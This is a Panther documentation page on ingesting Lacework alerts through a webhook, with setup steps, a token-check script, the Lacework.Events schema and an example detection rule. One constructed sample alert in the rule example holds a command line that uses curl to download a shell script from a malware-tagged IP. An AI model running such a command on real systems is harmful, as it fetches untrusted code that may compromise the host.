# Lacework Alert Channel Webhook

## Overview

You can ingest Lacework Event logs into Panther by configuring a [Custom Webhook Alert Channel](https://docs.lacework.net/onboarding/webhook) to post events to a Panther [HTTP source](https://docs.panther.com/data-onboarding/data-transports/http).

If you are looking for instructions on ingesting Lacework log types other than `Lacework.Events`, please see the [Lacework Export documentation](https://docs.panther.com/data-onboarding/supported-logs/lacework/export).

## How to onboard Alert Channel Webhook logs to Panther

### Step 1: Create a Lacework Alert Channel Webhook log source in Panther

1. In the left-hand navigation bar of your Panther Console, click **Configure** > **Log Sources.**
2. Click **Create New**.
3. Search for "Lacework Alert Channel Webhook", then click its tile.
   * In the slide-out panel, the **Transport Mechanism** dropdown in the upper-right corner will be pre-populated with the **HTTP** option.
4. Click **Start Setup**.

   <div data-full-width="true"><figure><img src="https://4011785613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LgdiSWdyJcXPahGi9Rs-2910905616%2Fuploads%2Fgit-blob-0c9d1d9ea04a90b139ab125f1d88e3a33b111d8a%2FScreenshot%202024-02-21%20at%2010.50.41%20AM.png?alt=media" alt="In the Panther Console, the slideout panel for Lacework Alert Channel Webhook is open. Start Setup is in the upper right corner."><figcaption></figcaption></figure></div>
5. Follow [Panther's instructions for configuring an HTTP Source](https://docs.panther.com/data-onboarding/data-transports/http).
   * During setup, on the security configuration page, choose [bearer authentication](https://docs.panther.com/data-transports/http#bearer). You can generate a token value by clicking the circular arrows, or supply your own. This token is the only thing that authenticates Lacework to your source, so treat it as a secret: anyone who obtains it can post arbitrary events into Panther.\
     ![](https://4011785613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-LgdiSWdyJcXPahGi9Rs-2910905616%2Fuploads%2Fgit-blob-361da8478686d08ae35df333d4e0250cfb450b51%2Fbearer-auth.jpg?alt=media)
   * Payloads sent to this source are subject to the [payload requirements for all HTTP sources](https://docs.panther.com/data-transports/http#payload-requirements).
   * Do not proceed to the next step until the creation of your HTTP endpoint has completed.

### Step 2: Configure Lacework to push logs to your Panther HTTP source

* Follow [Lacework's documentation](https://docs.lacework.net/onboarding/webhook) to configure a Custom Webhook Alert Channel, using the HTTP source endpoint URL and the bearer token you set up in Step 1.
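Before pointing Lacework at the endpoint, it is worth confirming that the HTTP source accepts a bearer-authenticated POST and rejects a wrong token. The script below is an added smoke test, not tooling from Panther or Lacework: it builds the request the way the webhook will (JSON body, `Authorization: Bearer <token>` header) and reports the status code. `PANTHER_HTTP_URL` and `PANTHER_BEARER_TOKEN` are hypothetical environment variables holding the URL and token from Step 1, and the event is constructed to carry only the fields the `Lacework.Events` schema marks as required.

```python
"""Smoke-test a Panther HTTP source with a Lacework-shaped event.

Added example for this page, not Panther's or Lacework's own tooling.
Assumptions: PANTHER_HTTP_URL / PANTHER_BEARER_TOKEN (hypothetical env vars)
hold the endpoint URL and bearer token created in Step 1; SAMPLE_EVENT is a
constructed event, not real Lacework output.
"""
import json
import os
import urllib.error
import urllib.request

# Constructed sample event carrying only the schema's required top-level
# fields, since real webhook payloads often contain just a subset of the schema.
SAMPLE_EVENT = {
    "EVENT_CATEGORY": "App",
    "EVENT_DETAILS": {"data": []},
    "SEVERITY": 3,
    "START_TIME": "21 Feb 2024 10:50 GMT",  # strftime=%d %b %Y %H:%M %Z
    "SUMMARY": "Test event from the Panther HTTP source smoke test",
    "EVENT_TYPE": "NewExternalServerDns",
    "EVENT_NAME": "Smoke test",
    "LINK": "https://example.lacework.net/ui/investigation/monitor/AlertInbox/1",
    "EVENT_ID": 1,
    "ACCOUNT": "EXAMPLE",
    "SOURCE": "Agent",
}


def build_request(url: str, token: str, event: dict) -> urllib.request.Request:
    """Build the POST the way the webhook delivers it: a JSON body and the
    bearer token in the Authorization header."""
    body = json.dumps(event).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/json",
            "Authorization": f"Bearer {token}",
        },
    )


def post_event(url: str, token: str, event: dict, timeout: float = 10.0) -> int:
    """POST the event and return the HTTP status code.

    401/403 almost always means the token does not match the one configured on
    the source; any non-2xx status means Lacework's deliveries would be
    rejected too, so fix it before creating the alert channel.
    """
    req = build_request(url, token, event)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


if __name__ == "__main__":
    url = os.environ["PANTHER_HTTP_URL"]
    token = os.environ["PANTHER_BEARER_TOKEN"]
    print(f"{post_event(url, token, SAMPLE_EVENT)} from {url}")
```

Run it once with the real token (expect a 2xx) and once with a deliberately wrong token (expect 401 or 403); if both return 2xx, the source is not actually enforcing bearer authentication and should be fixed before any production data flows.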

## Supported log type

### Lacework.Events

Lacework.Events represents a Lacework alert as delivered to Panther by a Custom Webhook Alert Channel.

Reference: [Lacework Documentation on Events](https://www.lacework.com/platform/).

{% hint style="info" %}
Lacework webhook payloads often contain only a subset of the fields shown below in Panther's `Lacework.Events` schema. Many fields in this schema are included to accommodate edge cases. See example payloads in [the Lacework documentation](https://docs.lacework.net/onboarding/webhook).
{% endhint %}

```yaml
    - name: EVENT_CATEGORY
      required: true
      description: The category the event falls into
      type: string
    - name: EVENT_DETAILS
      required: true
      description: The event details
      type: object
      fields:
        - name: data
          description: The array of event data
          type: array
          element:
            type: object
            fields:
                - name: START_TIME
                  description: The event start time.
                  type: timestamp
                  timeFormat: rfc3339
                - name: END_TIME
                  description: The event end time.
                  type: timestamp
                  timeFormat: rfc3339
                - name: EVENT_TYPE
                  description: The event type description, e.g. launched new binary.
                  type: string
                - name: EVENT_ID
                  description: The event alert ID.
                  type: string
                - name: EVENT_ACTOR
                  description: The origin of the event, e.g. AWS, User.
                  type: string
                - name: EVENT_MODEL
                  description: The model that triggered an alert.
                  type: string
                - name: ENTITY_MAP
                  description: The map of related fields to the detection alert.
                  type: object
                  fields:
                    - name: User
                      description: Any user based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: MACHINE_HOSTNAME
                              description: Hostname field
                              type: string
                            - name: USERNAME
                              description: Username field
                              type: string
                              indicators:
                                - username
                    - name: Application
                      description: Any application based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: APPLICATION
                              description: Application field
                              type: string
                            - name: HAS_EXTERNAL_CONNS
                              description: HasExternalConns field
                              type: bigint
                            - name: IS_CLIENT
                              description: IsClient field
                              type: bigint
                            - name: IS_SERVER
                              description: IsServer field
                              type: bigint
                            - name: EARLIEST_KNOWN_TIME
                              description: EarliestKnownTime field
                              type: timestamp
                              timeFormat: rfc3339
                    - name: Machine
                      description: Any machine based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: HOSTNAME
                              description: Hostname field
                              type: string
                            - name: EXTERNAL_IP
                              description: ExternalIP field
                              type: string
                              indicators:
                                - ip
                            - name: INSTANCE_ID
                              description: InstanceID field
                              type: string
                            - name: INSTANCE_NAME
                              description: InstanceName field
                              type: string
                            - name: CPU_PERCENTAGE
                              description: CPUPercentage field
                              type: float
                            - name: INTERNAL_IP_ADDR
                              description: InternalIPAddress field
                              type: string
                              indicators:
                                - ip
                            - name: IS_EXTERNAL
                              description: IsExternal field
                              type: bigint
                    - name: Container
                      description: Any container based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: IMAGE_REPO
                              description: ImageRepo field
                              type: string
                            - name: IMAGE_TAG
                              description: ImageTag field
                              type: string
                            - name: HAS_EXTERNAL_CONNS
                              description: HasExternalConns field
                              type: bigint
                            - name: IS_CLIENT
                              description: IsClient field
                              type: bigint
                            - name: IS_SERVER
                              description: IsServer field
                              type: bigint
                            - name: FIRST_SEEN_TIME
                              description: FirstSeenTime field
                              type: timestamp
                              timeFormat: rfc3339
                            - name: POD_NAMESPACE
                              description: PodNamespace field
                              type: string
                            - name: POD_IP_ADDR
                              description: PodIPAddress field
                              type: string
                              indicators:
                                - ip
                    - name: DnsName
                      description: Any dns based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: HOSTNAME
                              description: Hostname field
                              type: string
                            - name: PORT_LIST
                              description: PortList field
                              type: array
                              element:
                                type: int
                            - name: TOTAL_IN_BYTES
                              description: TotalINBytes field
                              type: float
                            - name: TOTAL_OUT_BYTES
                              description: TotalOUTBytes field
                              type: float
                    - name: IpAddress
                      description: Any ip based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: IP_ADDRESS
                              description: SourceIPAddress field
                              type: string
                              indicators:
                                - ip
                            - name: TOTAL_IN_BYTES
                              description: TotalINBytes field
                              type: float
                            - name: TOTAL_OUT_BYTES
                              description: TotalOUTBytes field
                              type: float
                            - name: THREAT_TAGS
                              description: ThreatTags field
                              type: array
                              element:
                                type: string
                            - name: THREAT_SOURCE
                              description: ThreatSource field
                              type: json
                            - name: COUNTRY
                              description: Country field
                              type: string
                            - name: REGION
                              description: Region field
                              type: string
                            - name: PORT_LIST
                              description: PortList field
                              type: array
                              element:
                                type: int
                            - name: FIRST_SEEN_TIME
                              description: FirstSeenTime field
                              type: string
                    - name: Process
                      description: Any process based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: HOSTNAME
                              description: Hostname field
                              type: string
                            - name: PROCESS_ID
                              description: ProcessID field
                              type: bigint
                            - name: PROCESS_START_TIME
                              description: ProcessStartTime field
                              type: timestamp
                              timeFormat: rfc3339
                            - name: CMDLINE
                              description: CommandLine field
                              type: string
                            - name: CPU_PERCENTAGE
                              description: CPUPercentage field
                              type: float
                    - name: FileDataHash
                      description: Any filehash based info involved in an alert.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: FILEDATA_HASH
                              description: FiledataHash field
                              type: string
                            - name: MACHINE_COUNT
                              description: MachineCount field
                              type: bigint
                            - name: EXE_PATH_LIST
                              description: EXEPathList field
                              type: array
                              element:
                                type: string
                            - name: FIRST_SEEN_TIME
                              description: FirstSeenTime field
                              type: timestamp
                              timeFormat: rfc3339
                            - name: IS_KNOWN_BAD
                              description: ISKnownBad field
                              type: bigint
                    - name: FileExePath
                      description: Any executable filepath information.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: EXE_PATH
                              description: EXEPath field
                              type: string
                            - name: FIRST_SEEN_TIME
                              description: FirstSeenTime field
                              type: timestamp
                              timeFormat: rfc3339
                            - name: LAST_FILEDATA_HASH
                              description: LastFileDataHash field
                              type: string
                            - name: LAST_PACKAGE_NAME
                              description: LastPackageName field
                              type: string
                            - name: LAST_VERSION
                              description: LastVersion field
                              type: string
                            - name: LAST_FILE_OWNER
                              description: LastFileOwner field
                              type: string
                    - name: SourceIpAddress
                      description: Source IP based information.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: IP_ADDRESS
                              description: SourceIPAddress field
                              type: string
                              indicators:
                                - ip
                            - name: REGION
                              description: Region field
                              type: string
                            - name: COUNTRY
                              description: Country field
                              type: string
                    - name: API
                      description: The service and endpoint.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: SERVICE
                              description: EventSource field
                              type: string
                            - name: API
                              description: EventName field
                              type: string
                    - name: Region
                      description: Regional based information.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: REGION
                              description: Region field
                              type: string
                            - name: ACCOUNT_LIST
                              description: RecipientAccountID field
                              type: array
                              element:
                                type: string
                    - name: CT_User
                      description: Cloudtrail user information.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: USERNAME
                              description: Username field
                              type: string
                              indicators:
                                - username
                            - name: ACCOUNT_ID
                              description: AccountID field
                              type: string
                            - name: MFA
                              description: MFA field
                              type: bigint
                            - name: API_LIST
                              description: APIList field
                              type: array
                              element:
                                type: string
                            - name: REGION_LIST
                              description: RegionList field
                              type: array
                              element:
                                type: string
                            - name: PRINCIPAL_ID
                              description: AccessKeyID field
                              type: string
                    - name: Resource
                      description: Resource values.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: NAME
                              description: Name field
                              type: string
                            - name: VALUE
                              description: Value field
                              type: string
                    - name: RecId
                      description: Receiver account info.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: REC_ID
                              description: RECID field
                              type: string
                            - name: ACCOUNT_ID
                              description: RecipientAccountID field
                              type: string
                            - name: ACCOUNT_ALIAS
                              description: AccountAlias field
                              type: string
                            - name: TITLE
                              description: Title field
                              type: string
                            - name: STATUS
                              description: Status field
                              type: string
                            - name: EVAL_TYPE
                              description: EVALType field
                              type: string
                            - name: EVAL_GUID
                              description: EVALGUID field
                              type: string
                    - name: CustomRule
                      description: Custom Rule info.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: LAST_UPDATED_TIME
                              description: LastUpdatedTime field
                              type: timestamp
                              timeFormat: rfc3339
                            - name: LAST_UPDATED_USER
                              description: LastUpdatedUser field
                              type: string
                            - name: DISPLAY_FILTER
                              description: DisplayFilter field
                              type: string
                            - name: RULE_GUID
                              description: RuleGUID field
                              type: string
                    - name: NewViolation
                      description: Violation Ref.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: REC_ID
                              description: RECID field
                              type: string
                            - name: REASON
                              description: Reason field
                              type: string
                            - name: RESOURCE
                              description: Resource field
                              type: string
                    - name: ViolationReason
                      description: A reason for the violation.
                      type: array
                      element:
                        type: object
                        fields:
                            - name: REC_ID
                              description: RECID field
                              type: string
                            - name: REASON
                              description: Reason field
                              type: string
    - name: SEVERITY
      required: true
      description: The severity level of the alert
      type: bigint
    - name: START_TIME
      required: true
      description: The event start time.
      type: timestamp
      timeFormat: strftime=%d %b %Y %H:%M %Z
      isEventTime: true
    - name: SUMMARY
      required: true
      description: The alert title and quick summary
      type: string
    - name: EVENT_TYPE
      required: true
      description: The type of event
      type: string
    - name: EVENT_NAME
      required: true
      description: The event name
      type: string
    - name: LINK
      required: true
      description: A link to the Lacework dashboard for the event
      type: string
    - name: EVENT_ID
      required: true
      description: The eventID reference
      type: bigint
    - name: ACCOUNT
      required: true
      description: The Lacework tenant that created the event
      type: string
    - name: SOURCE
      required: true
      description: The data source the event triggered on
      type: string
```
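The schema above is easier to reason about against a concrete event. The module below is an added example of a Panther Python rule over `Lacework.Events`; it is not a rule that Panther or Lacework ships. It fires on alerts Lacework rated Critical or High, parses the top-level `START_TIME` in its `%d %b %Y %H:%M %Z` format, and walks `ENTITY_MAP` to collect the fields the schema marks as `ip` and `username` indicators for the alert context. Assumptions: the Lacework numeric `SEVERITY` scale (1 = Critical through 5 = Info) is assumed rather than taken from this page; the sample events are constructed, not real Lacework output; the event is read with dict-style `.get()`, which Panther's event object also provides, so the same code runs stand-alone and as a rule.

```python
"""Panther rule over Lacework.Events: an added example, not a rule shipped by
Panther or Lacework.

Assumptions: Lacework SEVERITY 1 = Critical .. 5 = Info (assumed mapping);
HIGH_EVENT / LOW_EVENT are constructed to match the schema, not real output;
rule/title/severity/alert_context follow Panther's rule function names.
"""
from datetime import datetime

# Assumed mapping of Lacework numeric severity to Panther severity strings.
SEVERITY_MAP = {1: "CRITICAL", 2: "HIGH", 3: "MEDIUM", 4: "LOW", 5: "INFO"}
ESCALATE_AT = 2  # fire on Critical (1) and High (2)

# ENTITY_MAP groups and the fields the schema marks as ip / username indicators.
IP_FIELDS = {
    "Machine": ("EXTERNAL_IP", "INTERNAL_IP_ADDR"),
    "Container": ("POD_IP_ADDR",),
    "IpAddress": ("IP_ADDRESS",),
    "SourceIpAddress": ("IP_ADDRESS",),
}
USER_FIELDS = {"User": ("USERNAME",), "CT_User": ("USERNAME",)}


def parse_start_time(value):
    """Top-level START_TIME uses strftime=%d %b %Y %H:%M %Z, e.g.
    '21 Feb 2024 10:50 GMT'. Returns None instead of raising so a single
    malformed field cannot take the whole rule down."""
    try:
        return datetime.strptime(value, "%d %b %Y %H:%M %Z")
    except (TypeError, ValueError):
        return None


def _entities(event):
    """Yield (group, entity) for every ENTITY_MAP entry of every data item."""
    for item in (event.get("EVENT_DETAILS") or {}).get("data") or []:
        for group, entities in (item.get("ENTITY_MAP") or {}).items():
            for entity in entities or []:
                yield group, entity


def _collect(event, field_map):
    """Unique, sorted values of the mapped fields across all entities."""
    found = set()
    for group, entity in _entities(event):
        for field in field_map.get(group, ()):
            if entity.get(field):
                found.add(entity[field])
    return sorted(found)


def rule(event):
    sev = event.get("SEVERITY")
    return isinstance(sev, int) and 1 <= sev <= ESCALATE_AT


def severity(event):
    return SEVERITY_MAP.get(event.get("SEVERITY"), "MEDIUM")


def title(event):
    return f"Lacework [{event.get('ACCOUNT')}] {event.get('EVENT_TYPE')}: {event.get('SUMMARY')}"


def alert_context(event):
    start = parse_start_time(event.get("START_TIME"))
    return {
        "event_id": event.get("EVENT_ID"),
        "link": event.get("LINK"),
        "start_time": start.isoformat() if start else event.get("START_TIME"),
        "ips": _collect(event, IP_FIELDS),
        "usernames": _collect(event, USER_FIELDS),
    }


# Constructed sample events (not real Lacework output).
HIGH_EVENT = {
    "EVENT_CATEGORY": "App",
    "EVENT_DETAILS": {"data": [{
        "START_TIME": "2024-02-21T10:50:00Z",
        "EVENT_TYPE": "NewExternalServerDns",
        "EVENT_ID": "12345",
        "ENTITY_MAP": {
            "Machine": [{"HOSTNAME": "web-1", "EXTERNAL_IP": "203.0.113.10",
                         "INTERNAL_IP_ADDR": "10.0.1.5", "IS_EXTERNAL": 1}],
            "Process": [{"HOSTNAME": "web-1", "PROCESS_ID": 4242,
                         "CMDLINE": "curl http://203.0.113.77/x.sh"}],
            "IpAddress": [{"IP_ADDRESS": "203.0.113.77", "THREAT_TAGS": ["malware"]}],
            "User": [{"MACHINE_HOSTNAME": "web-1", "USERNAME": "www-data"}],
        },
    }]},
    "SEVERITY": 2,
    "START_TIME": "21 Feb 2024 10:50 GMT",
    "SUMMARY": "New external server connection from web-1",
    "EVENT_TYPE": "NewExternalServerDns",
    "EVENT_NAME": "New External Server DNS",
    "LINK": "https://example.lacework.net/ui/investigation/monitor/AlertInbox/12345",
    "EVENT_ID": 12345,
    "ACCOUNT": "EXAMPLE",
    "SOURCE": "Agent",
}
LOW_EVENT = {**HIGH_EVENT, "SEVERITY": 4, "EVENT_DETAILS": {"data": []}}
```

Two details matter in practice: `rule` checks that `SEVERITY` is an `int` before comparing, because a string `"2"` arriving from a malformed payload should not silently match or raise; and `parse_start_time` follows the schema's top-level format rather than the RFC 3339 format used inside `EVENT_DETAILS.data`, which is where the two `START_TIME` fields differ.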
